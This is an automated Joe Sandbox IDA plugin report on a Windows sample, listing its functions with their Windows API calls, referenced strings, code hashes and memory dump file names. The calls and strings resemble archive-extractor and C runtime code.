Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
Instruction ID: d7a11264a7f8f978e2f0d6a0396ae504948641953a674c100492c999eab91746
Opcode Fuzzy Hash: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
Instruction Fuzzy Hash: 83A0243004400D47DD101730C71400C7710F7117C030001D47007CF051C71F4407CF00

Uniqueness

Uniqueness Score: -1.00%

Function 0101AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0101AE72,C:\Users\user\Desktop,00000000,0104946A,00000006), ref: 0101AC08

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
Instruction ID: 5b9290ba93f63bd00ba45889395ca824d03d5855e80da6fa2305b001c5dde865
Opcode Fuzzy Hash: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
Instruction Fuzzy Hash: 7FA011302002008B82000A328B8AA0EBAAABFA2B20F00C028A08088020CB3AC820AA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0101C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0101C2B1
EndDialog.USER32(?,00000006), ref: 0101C2C4
GetDlgItem.USER32(?,0000006C), ref: 0101C2E0
SetFocus.USER32(00000000), ref: 0101C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0101C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0101C358
FindFirstFileW.KERNEL32(?,?), ref: 0101C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C3D4
_swprintf.LIBCMT ref: 0101C404

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0101C417
FindClose.KERNEL32(00000000), ref: 0101C41E
_swprintf.LIBCMT ref: 0101C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0101C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0101C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0101C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C509
_swprintf.LIBCMT ref: 0101C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0101C548
_swprintf.LIBCMT ref: 0101C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0101C5AF

Part of subcall function 0101AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101AF35
Part of subcall function 0101AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0103E72C,?,?), ref: 0101AF84

Strings

%s %s %s, xrefs: 0101C3F2, 0101C527
%s %s, xrefs: 0101C469, 0101C58E
REPLACEFILEDLG, xrefs: 0101C247

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: af60564325fbea8a2b9df19638fca62da2d68a391eee9caf7b3497bc43d7ed67
Instruction ID: da0a8abd295e4b535dad5a26aebcaac267da91cb0451151e9f7264ebc25dd081
Opcode Fuzzy Hash: af60564325fbea8a2b9df19638fca62da2d68a391eee9caf7b3497bc43d7ed67
Instruction Fuzzy Hash: ED917372148345BBE2319AA4DD49FFB7BECEB4A700F044819F7C9DA085D67AE6048762

Uniqueness

Uniqueness Score: -1.00%

Function 01006FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01006FAA
_wcslen.LIBCMT ref: 01007013
_wcslen.LIBCMT ref: 01007084

Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00

Part of subcall function 0100A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1
Part of subcall function 0100A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 01007139
CloseHandle.KERNEL32(00000000), ref: 01007155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 01007298

Part of subcall function 01009DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
Part of subcall function 01009DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70

Part of subcall function 01009620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B

Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532

Strings

UNC\, xrefs: 01007051
SeRestorePrivilege, xrefs: 01006FC2
\??\, xrefs: 0100702B
SeCreateSymbolicLinkPrivilege, xrefs: 01006FCC

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2821348736-3508440684
Opcode ID: 6536b728b9fbe259d7717b39f7925ec78f5713db0c09245b1a60546fcc0fb0f7
Instruction ID: d468226b18f36b42239ba321f75972b55fbf4c9e34f8fb9fc6045c98d0c20a36
Opcode Fuzzy Hash: 6536b728b9fbe259d7717b39f7925ec78f5713db0c09245b1a60546fcc0fb0f7
Instruction Fuzzy Hash: 58C1B2B1900645AAFB26DB78CC81BEEB7ACBF14300F00455AF9D6E71C1D779B6848B61

Uniqueness

Uniqueness Score: -1.00%

Function 0102D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0102DA34

Strings

1#IND, xrefs: 0102EC2C
1#QNAN, xrefs: 0102EC3A
1#INF, xrefs: 0102EC41
1#SNAN, xrefs: 0102EC33

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: c45f7d45305f83a111b693438b6905f8ba8bf9dacaae9d7b4c84f7eb58ae8eb9
Instruction ID: 649a79ec5fab2f3b232b8cc015445a4b6726e495beb1da0414bcea7bfc4c180c
Opcode Fuzzy Hash: c45f7d45305f83a111b693438b6905f8ba8bf9dacaae9d7b4c84f7eb58ae8eb9
Instruction Fuzzy Hash: C1C24872E086298FDB65CE68DD407EAB7F5EB44304F1441EAD98DE7241E778AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 010032F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01003300
_swprintf.LIBCMT ref: 010036C7

Strings

CMT, xrefs: 01003A17
hc%u, xrefs: 0100370A
h%u, xrefs: 010036BC

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 873823c4668bf0f7b8de8ec16bd4dab6b592a7f7509ee0f390ab7d2ed271cb90
Instruction ID: d59c60b1e4a6152a39eefc46e876a1faced6b55a6543b2a301688526d96e63b7
Opcode Fuzzy Hash: 873823c4668bf0f7b8de8ec16bd4dab6b592a7f7509ee0f390ab7d2ed271cb90
Instruction Fuzzy Hash: 9D32A1715106859FFB1ADF74C894AEA3BA5BF15300F0845BDEDCA8F2C2DA74A549CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0100286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01002874
_strlen.LIBCMT ref: 01002E3F

Part of subcall function 010102BA: __EH_prolog.LIBCMT ref: 010102BF

Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,0001042C), ref: 01011BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01002F91

Strings

CMT, xrefs: 01002FBC

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 7cbd3f1beb7ac275f85b55c301550474d41f695897dc89aadfe2cb9bc5783be8
Instruction ID: 967554b208251902983a41a48b7a3b27df823c820547e3ec87fb14a6e3c9828b
Opcode Fuzzy Hash: 7cbd3f1beb7ac275f85b55c301550474d41f695897dc89aadfe2cb9bc5783be8
Instruction Fuzzy Hash: 6262E4715006458FFB1ADF38C8886EA3BA1BF64300F0845BEEDDA8B2C2DB759545CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0101F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0101F844
IsDebuggerPresent.KERNEL32 ref: 0101F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0101F930
UnhandledExceptionFilter.KERNEL32(?), ref: 0101F93A

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 33dd3e55305a5d974c9f738476a5e3e022fad23c1ac7952bd56bb2e34ccf5dc3
Instruction ID: 7cc8686e5964e7804ef8269a00d8d5d85b81af89c99ca3cf040891ed4e38ce4b
Opcode Fuzzy Hash: 33dd3e55305a5d974c9f738476a5e3e022fad23c1ac7952bd56bb2e34ccf5dc3
Instruction Fuzzy Hash: 27312BB5D4521ADBDB21DFA4D9897CCBBF8BF04304F1040DAE44DAB254EB759A888F44

Uniqueness

Uniqueness Score: -1.00%

Function 0101E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,0101E5E8,0000001C,0101E7DD,00000000,?,?,?,?,?,?,?,0101E5E8,00000004,01061CEC,0101E86D), ref: 0101E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0101E5E8,00000004,01061CEC,0101E86D), ref: 0101E6CF

Strings

D, xrefs: 0101E6C3

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 5e4d1af27fe096fb9a7ffcc892af1d617e293605103f2521ccdce6260a2c90cb
Instruction ID: f5783f18896788a5adddb61eaed8e0b2581357fd7fceb785b3640053557cd7e8
Opcode Fuzzy Hash: 5e4d1af27fe096fb9a7ffcc892af1d617e293605103f2521ccdce6260a2c90cb
Instruction Fuzzy Hash: 2101D4326001096BEB24DE29DC49ADD7BEABFC4224F0CC160ED99DB148D638D9058680

Uniqueness

Uniqueness Score: -1.00%

Function 01028EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01028FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 01028FBF
UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 01028FCC

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ff59e77c28c9b8899e7b8c724debe5768b95ad4b8a6a26be589dd2734205201e
Instruction ID: 35d191b160676e77ae8cfb2abf9217132951dd5ef155ac2260110fe556458fb0
Opcode Fuzzy Hash: ff59e77c28c9b8899e7b8c724debe5768b95ad4b8a6a26be589dd2734205201e
Instruction Fuzzy Hash: E031D675901229ABCB61DF28D888BDCBBF8BF08310F5041DAE85CA7250E7749B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 0102D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 826a7ec12831c9f14257fcae7966b07166a9ac6892a8aae26e6f4152fde86136
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: B3022D71E002299FDF14CFA9C8806ADBBF5FF48314F1581AAD959E7385D731AD418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0101AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,0103E72C,?,?), ref: 0101AF84

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 92711f754a5361c45b7c061309e0871fa9a9a3292029e34f057b781c755bd335
Instruction ID: d37cd224c35d60a75ac3845788b527c85c020bc1ce6cd42a0970a20fb95f1b6a
Opcode Fuzzy Hash: 92711f754a5361c45b7c061309e0871fa9a9a3292029e34f057b781c755bd335
Instruction Fuzzy Hash: B701717A200309AAD7219F64DC45F9B77BCFF08710F404422FA8597144D3799914CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 01006C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(01006DDF,00000000,00000400), ref: 01006C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 01006C95

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b097c811c3cbfd300585c694e25bacdf350e3035f8d87cab83f701e0eaf27b16
Instruction ID: aaf3ce3f98da10f8d30ac02543ddfaa991c6f3c05fc117a96e6c58695c4badb8
Opcode Fuzzy Hash: b097c811c3cbfd300585c694e25bacdf350e3035f8d87cab83f701e0eaf27b16
Instruction Fuzzy Hash: 82D0C731344304BFFA550A614D46F2A7B9DBF45B55F14C4047795D80D0C67A94249715

Uniqueness

Uniqueness Score: -1.00%

Function 010319F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,010319EF,?,?,00000008,?,?,0103168F,00000000), ref: 01031C21

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ee64f2346ce76992b536436887bbcbab1efd998db828218efa40dafd02960227
Instruction ID: 3e0140f2afd3cd21a77705dc58de485500983fee187965b91e2a98506531ecb0
Opcode Fuzzy Hash: ee64f2346ce76992b536436887bbcbab1efd998db828218efa40dafd02960227
Instruction Fuzzy Hash: 76B14A312206089FE759CF2CC486B657BE4FF89365F258698E9D9CF2A1C335D992CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0100B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0100B16B

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 03c409a45f1f7f2410b36f0bf6e477ecb1f5369465c30205aeb8e4465b608701
Instruction ID: 86870ecc5428a4c327d346f5e3f011fe405db3b60f1d97de61280db7d57da781
Opcode Fuzzy Hash: 03c409a45f1f7f2410b36f0bf6e477ecb1f5369465c30205aeb8e4465b608701
Instruction Fuzzy Hash: CAF03AB8E002088FDB39CB18EA966D973F5FB98355F104695E69593384C3B9B9C08F61

Uniqueness

Uniqueness Score: -1.00%

Function 010040FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 010041BC

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
